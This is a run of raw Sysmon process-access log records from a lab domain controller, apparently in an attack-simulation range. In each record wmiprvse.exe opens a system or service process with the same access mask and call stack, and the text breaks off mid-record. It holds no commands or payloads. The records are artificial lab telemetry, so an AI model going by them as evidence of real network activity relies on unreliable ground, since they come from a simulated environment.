10341000x800000000000000029301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 